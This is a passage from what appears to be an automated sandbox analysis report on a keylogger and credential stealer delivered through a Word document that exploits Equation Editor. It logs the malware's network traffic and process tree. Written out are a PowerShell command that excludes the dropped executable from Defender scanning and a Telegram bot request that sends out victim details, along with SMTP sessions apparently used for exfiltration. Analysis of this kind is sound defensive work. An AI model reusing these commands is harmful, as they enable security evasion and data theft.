                                              2024-09-26 07:19:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.2249168188.114.96.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 07:19:32 UTC676INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:32 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 4
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mt0Ja%2BzqpmZFMS%2F%2B6v55VFzQ9BCfYLHCvLCcmcTB4EQIpVD5hRatb7Ipv54kdst9JIleA8S5i8saVZWNmh%2F%2FR8hqsYKFxiuePTJ100CJog8kt2p6o2bYJcDlsRMUJM7shJmnqfiJ"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917c7ae97c0f73-EWR
                                              2024-09-26 07:19:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.2249170188.114.96.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:33 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 07:19:33 UTC670INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:33 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 5
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gt6m4L%2F0B7HaCpNjd6ttXMnEut0AngkvOFVOjZcbF1AICBrQaebe512vQt0Uw8agfgkaSwP8Cqb7ywCF94jJFF30q2UmaFDAdzNTMF25OqlVtRL1i4sBUDWhBbb2bON8lh3w6R%2Fl"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917c84ebcb7d1e-EWR
                                              2024-09-26 07:19:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.2249172188.114.96.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:35 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 07:19:36 UTC676INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:35 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 7
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FpR3gdkbA7fIPbY0JhEYjZ0%2Fn2eYOoE%2Bpb6v8Ekzf6RYpTsD4kQ9CazD%2B83LhEBucIqYry6e1mGdebklzh8XbSRhHz0QCPZgz6YrJQ8oBeUV58Tsbil9R7rN7%2FcCDyg%2FcjgE7cYs"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917c91c8904346-EWR
                                              2024-09-26 07:19:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.2249174188.114.96.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:38 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 07:19:38 UTC675INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:38 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 10
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hCvRq8aZXC8HVdMRuXeUBWWrZcWFzZbR%2F3axrFzav6zoEyjLG7WWsfDyKoN2d45GZaBX07CNDa1kU6wlNlIUK2zjE0FhGbymdPXHNSKIfFwT%2BdSGmu%2BOHAQ0At%2BqNMZxJQObDTAq"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917ca17d094315-EWR
                                              2024-09-26 07:19:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.2249176188.114.96.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 07:19:40 UTC683INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:40 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 12
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBdj%2BTWxkbGAYOl%2FO9li5HxL%2BtV7sBjoB383pshVat4ynLDkS3AM3tBDcfQ7%2Bz37xcXhEKbXih%2ByZgrIgJLI4EBRQAdM5Iv4ws71v2V%2BYwsTQdIaOdmtFTXabP9s46%2F%2B5nyRVxyI"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917cab9c514245-EWR
                                              2024-09-26 07:19:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.2249178188.114.97.34433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:41 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 07:19:41 UTC671INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 07:19:41 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 13
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5iIEIDQZojkF31XSEb%2FXudmyWL2bhB66TMEbxv8l0EUIus3IJItvv14ZuHSJr4kzS5EgIb9yxYNNHYl3eYFzsnf6UbafvYC2HxhWDdesMJKeW%2FpfpAK6Mh0qUquVICTdQtXvKiGl"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c917cb28b4743f1-EWR
                                              2024-09-26 07:19:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 07:19:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.2249179149.154.167.2204433508C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 07:19:41 UTC352OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-09-26 07:19:42 UTC344INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 07:19:42 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 07:19:42 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Sep 26, 2024 09:19:59.252964020 CEST58749180217.12.218.219192.168.2.22220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 09:19:59 +0200
                                              Sep 26, 2024 09:19:59.253278971 CEST49180587192.168.2.22217.12.218.219EHLO 358075
                                              Sep 26, 2024 09:19:59.427478075 CEST58749180217.12.218.219192.168.2.22250-h2-eu1.layer6.net Hello 358075 [8.46.123.33]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN CRAM-MD5
                                              250-CHUNKING
                                              250-STARTTLS
                                              250 HELP
                                              Sep 26, 2024 09:19:59.506918907 CEST49180587192.168.2.22217.12.218.219STARTTLS
                                              Sep 26, 2024 09:19:59.680176973 CEST58749180217.12.218.219192.168.2.22220 TLS go ahead
                                              Sep 26, 2024 09:19:59.899851084 CEST58749180217.12.218.219192.168.2.22220 TLS go ahead
                                              Sep 26, 2024 09:20:05.132533073 CEST58749181217.12.218.219192.168.2.22220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 09:20:05 +0200
                                              Sep 26, 2024 09:20:05.132725000 CEST49181587192.168.2.22217.12.218.219EHLO 358075
                                              Sep 26, 2024 09:21:11.370918989 CEST58749183217.12.218.219192.168.2.22220 h2-eu1.layer6.net ESMTP Exim 4.97.1 Thu, 26 Sep 2024 09:21:11 +0200
                                              Sep 26, 2024 09:21:11.371081114 CEST49183587192.168.2.22217.12.218.219EHLO 358075
                                              Sep 26, 2024 09:21:11.542587996 CEST58749183217.12.218.219192.168.2.22250-h2-eu1.layer6.net Hello 358075 [8.46.123.33]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN CRAM-MD5
                                              250-CHUNKING
                                              250-STARTTLS
                                              250 HELP
                                              Sep 26, 2024 09:21:11.542742014 CEST49183587192.168.2.22217.12.218.219STARTTLS
                                              Sep 26, 2024 09:21:11.715711117 CEST58749183217.12.218.219192.168.2.22220 TLS go ahead

                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:03:19:17
                                              Start date:26/09/2024
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13fc20000
                                              File size:1'423'704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Target ID:2
                                              Start time:03:19:18
                                              Start date:26/09/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:03:19:22
                                              Start date:26/09/2024
                                              Path:C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
                                              Imagebase:0xd20000
                                              File size:708'096 bytes
                                              MD5 hash:3E2EA8C3F5CA13F16F8CA1C85087F6B6
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              Target ID:6
                                              Start time:03:19:23
                                              Start date:26/09/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
                                              Imagebase:0x50000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:03:19:23
                                              Start date:26/09/2024
                                              Path:C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Roaming\hgqilegacy20306.exe"
                                              Imagebase:0xd20000
                                              File size:708'096 bytes
                                              MD5 hash:3E2EA8C3F5CA13F16F8CA1C85087F6B6
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Target ID:9
                                              Start time:03:19:41
                                              Start date:26/09/2024
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543'304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:9.3%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:62.9%
                                                Total number of Nodes:116
                                                Total number of Limit Nodes:6
